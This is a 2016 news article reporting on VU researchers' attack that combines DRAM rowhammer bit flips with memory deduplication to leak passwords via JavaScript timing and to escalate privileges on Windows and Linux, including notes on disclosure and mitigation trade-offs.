Researchers present exploit that doesn’t need a software leak

By admin On May 25, 2016

Spread the love

Security researcher Herbert Bos, affiliated with the VU, and his research group have developed an attack that does not use bugs in software. This is partly due to shortcomings of dram memory and allows for example the retrieval of passwords.

The attack also means that many end-user systems are vulnerable. The professor of system and network security demonstrated the technique on a Windows 10 machine with the latest version of the Edge browser, using a javascript program, without exploiting known bugs in the software. He also carried out the attack on Linux. Bos explained his research on Wednesday in the BNR Digitaal program and will present it at both the IEEE symposium on security and privacy and the Blackhat conference. The research was conducted in collaboration with Erik Bosman, Kaveh Razavi and Cristiano Giuffrida.

The attack has two components. According to Bos, the first makes use of a shortcoming in dram memory chips. This technique is not new and is known as row hammering. By activating certain memory rows in quick succession, the state of adjacent memory cells can be changed. As a result, a bit value of 0 can be flipped to a value of 1. This is possible because the distance between the different cells on memory chips is small.

The second component of the attack is the fact that Windows 8.1 and 10 and certain virtualization services use a memory optimization technique known as deduplication by default. In doing so, identical information, which is present on two different memory pages, is merged on the same physical page. As a result, space can be saved when storing information.

The attack assumes that an attacker knows that a secret is present at a certain place in the memory, for example in the form of a password or an address of program code. Bos explains that an attacker then generates a large amount of matching memory pages, which differ only in the area where the password is stored.

If any of those generated bytes matches any of the ‘secret’ bytes, it will be deduplicated by the system. By writing to the shared memory page, the deduplication must be undone again, causing a time difference. This difference can be read out in the browser, for example, with a javascript program. Because the attacker knows which page was modified, he eventually also knows how to retrieve the password.

In addition, it is also possible to use this technique to write data to specific places in the memory, says Bos. In doing so, he makes use of the aforementioned shortcoming in the dram chips, by first looking for memory areas where he can flip bits. He then creates a memory page at that location, which corresponds to the page where sensitive data is stored. The agreement allows the system to deduplicate and allow the attacker to ensure that the resulting data ends up in the right place, where bit flipping is possible.

By subsequently performing this action, it is thus possible to modify the sensitive information, which can lead, for example, to privilege escalation. This allows an attacker to assign himself higher rights and thus perform various actions on a system.

The seriousness of this attack lies in the fact that there is little that can be done about it and that it does not require existing bugs in software, for example a zero day. According to Bos, Microsoft has been working on a solution for several months, but it is not available at the moment. Disabling deduplication would be a possibility, but it has major implications for data storage, especially on devices that have only a small amount of memory. Bos decided to go public with his findings, to make it clear that trust in many memory chips is misplaced.